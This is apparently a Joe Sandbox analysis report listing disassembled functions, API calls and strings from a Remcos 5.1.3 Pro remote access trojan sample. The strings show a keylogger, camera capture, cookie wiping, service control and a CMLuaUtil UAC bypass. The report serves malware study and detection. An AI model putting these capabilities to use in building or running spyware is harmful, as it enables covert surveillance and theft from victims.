                                                                                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                • String ID: a/p$am/pm$h{D
                                                                                                                                                • API String ID: 2936374016-2303565833
                                                                                                                                                • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
APIs
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
• _free.LIBCMT ref: 00444E87
• _free.LIBCMT ref: 00444E9E
• _free.LIBCMT ref: 00444EBD
• _free.LIBCMT ref: 00444ED8
• _free.LIBCMT ref: 00444EEF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: _free$AllocateHeap
• String ID: KED
• API String ID: 3033488037-2133951994
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$xUG$TG
• API String ID: 3554306468-1165877943
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: xUG$NG$NG$TG
• API String ID: 3114080316-2811732169
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
• __alloca_probe_16.LIBCMT ref: 00451231
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
• __freea.LIBCMT ref: 0045129D
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID: PkGNG
• API String ID: 313313983-263838557
APIs
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
• PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
• _free.LIBCMT ref: 00450FC8
  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00450FD3
• _free.LIBCMT ref: 00450FDE
• _free.LIBCMT ref: 00451032
• _free.LIBCMT ref: 0045103D
• _free.LIBCMT ref: 00451048
• _free.LIBCMT ref: 00451053
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
• int.LIBCPMT ref: 004111BE
  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
• std::_Facet_Register.LIBCPMT ref: 004111FE
• std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
• __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
APIs
• GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
• SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe), ref: 0040760B
  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• CoUninitialize.OLE32 ref: 00407664
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-556455252
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
• GetLastError.KERNEL32 ref: 0040BB22
Strings
• UserProfile, xrefs: 0040BAE8
• [Chrome Cookies not found], xrefs: 0040BB3C
• [Chrome Cookies found, cleared!], xrefs: 0040BB48
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
APIs
• AllocConsole.KERNEL32(00475338), ref: 0041CE35
• ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.1.3 Pro$CONOUT$
• API String ID: 2425139147-2212855755
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
• FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$PkGNG$mscoree.dll
• API String ID: 4061214504-213444651
APIs
• __allrem.LIBCMT ref: 0043ACE9
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
• __allrem.LIBCMT ref: 0043AD1C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
• __allrem.LIBCMT ref: 0043AD51
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
APIs
• Sleep.KERNEL32(00000000,?), ref: 004044C4
  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
• API String ID: 3469354165-3054508432
APIs
  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
• SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
• HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 493672254-0
                                                                                                                                                • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                                                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                                                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 1036877536-263838557
                                                                                                                                                • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                • _free.LIBCMT ref: 004482CC
                                                                                                                                                • _free.LIBCMT ref: 004482F4
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                • _abort.LIBCMT ref: 00448313
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                                                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                                                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                                                                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                                                                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID: @^E
                                                                                                                                                • API String ID: 269201875-2908066071
                                                                                                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 0-263838557
                                                                                                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                                APIs
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 3360349984-263838557
                                                                                                                                                • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
